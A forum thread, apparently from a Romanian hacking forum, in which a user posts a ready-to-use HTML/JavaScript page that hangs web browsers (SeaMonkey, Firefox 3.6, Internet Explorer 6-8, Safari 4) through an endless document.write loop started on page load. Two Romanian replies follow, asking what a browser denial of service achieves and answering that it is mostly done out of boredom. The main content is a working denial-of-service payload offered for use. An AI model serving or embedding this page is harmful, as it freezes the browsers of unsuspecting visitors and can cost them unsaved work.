Jump to content
Gonzalez

Simple HTML(JS) Remote Denial of Service example for WebBrowsers

Recommended Posts

Posted

Works on:

SeaMonkey 2.0.2,

Firefox 3.6,

Internet Exlorer 6,7 and 8,

Safari 4.0.4

Just save it as "sometext.html"

<!--

SeaMonkey 2.0.2, Firefox 3.6, Internet Exlorer 6,7 and 8, Safari 4.0.4
- Simple HTML(JS) Remote Denial of Service Example

-->

<body onload="javascript:Kill();"></body>

<script>

function Kill() {

for (i=0;i<1;i++)
{
document.write('<html><marquee><h'+i+'>'+i);
i--;
}

}

</script>

Posted

sunt curios, la va ajuta sa faceti DoS la un browser ? fortezi utilizatorul sa il redeschida ? pierde date utilizatorul ? ce-i asa deosebit ?

vreau idei.

sa zicem ca la un server inteleg la ce foloseste DoS-ul dar, la un browser ?

Posted
sunt curios, la va ajuta sa faceti DoS la un browser ? fortezi utilizatorul sa il redeschida ? pierde date utilizatorul ? ce-i asa deosebit ?

vreau idei.

sa zicem ca la un server inteleg la ce foloseste DoS-ul dar, la un browser ?

In general DoS nu ajuta la nimic, acuma s-ar putea sa aiba vreuni un motiv sa ii intrerupa conectiunea la utilizator pentru un anumit motiv. Dar in rest cred ca majoritatea o fac ... de plictiseala :|

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...